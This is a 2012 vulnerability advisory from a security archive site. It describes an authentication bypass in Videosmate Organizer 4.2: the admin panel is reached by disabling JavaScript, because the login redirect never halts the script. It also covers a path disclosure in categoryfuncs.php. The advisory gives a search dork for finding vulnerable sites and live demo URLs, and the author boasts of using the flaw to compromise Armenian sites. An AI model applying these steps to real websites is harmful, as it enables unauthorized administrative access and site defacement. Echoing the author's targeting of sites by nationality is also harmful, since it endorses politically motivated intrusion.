Videosmate Organizer 4.2 Authentication Bypass & Path Disclosure

2012.10.17
Credit: AkaStep
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

===================================================================== Vulnerable software: Videosmate Organizer V 4.2 (all versions) Vendor: http://videosmate.com/ Software License: Commercial Vulns: Authentication Bypass & Path Disclosure Risk: Critical Dork: intext:Powered by Videosmate Organizer ===================================================================== Vuln Description: As i noted above this script is commercial and that's why today i'm unable(may be lazy) to show you whereis vulnerability. I discovered this vulnerability while owning armenian sites. Flaw in that if the remote user is not authenticated against admin panel ( somesite.tld/sitedb/admin/ ) it seems script (after session checking thing) is unable to properly kill it's execution. Since i have no access to source code of this script i'll try to imagine how this process goes: Suppose: <?php session_start(); if (!isset($_SESSION['am_i_admin_or_am_i_logged_in_admin'])) echo "<script>self.location='login.php';</script>"; /* Notice: echo 'JS_REDIRECTION'; ** not ** die('JS_REDIRECTION'); */ /****** PWNED ********/ //YOU ARE ADMIN HERE// ?> Exploitation is simple like 2x2: Disable javascript in your browser and follow to: site.tld/sitedb/admin/admin.php (If you wonder then press CTRL+U you will see somethink like: <script> self.location='login.php';</script> <script> self.location='login.php';</script> ) Demo: http://www.videosmate.com/componentdemo/sitedb/admin/admin.php (<=Disable javascript in your browser or use NoScript then surf there) This is not end!! 111)) PATH DISCLOSURE: Direct access to: site.tld/componentdemo/include/categoryfuncs.php Demo: http://www.videosmate.com/componentdemo/include/categoryfuncs.php Warning: include(./settings/conf.php) [function.include]: failed to open stream: No such file or directory in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 7 Warning: include(./settings/conf.php) [function.include]: failed to open stream: No such file or directory in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 7 Warning: include() [function.include]: Failed opening './settings/conf.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 7 Warning: mysql_query() [function.mysql-query]: Access denied for user 'alphonse'@'localhost' (using password: NO) in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 14 Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 14 Error, query failed Please note that: I'm not responsible for any damage if the target site !='.am' domain xD)) ===================================================================== SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS: ===================================================================== packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru secunia.com securityhome.eu exploitsdownload.com exploit-db.com osvdb.com websecurity.com.ua to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3 * Also special thanks to: ottoman38 & HERO_AZE ===================================================================== /AkaStep

References:

http://videosmate.com/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top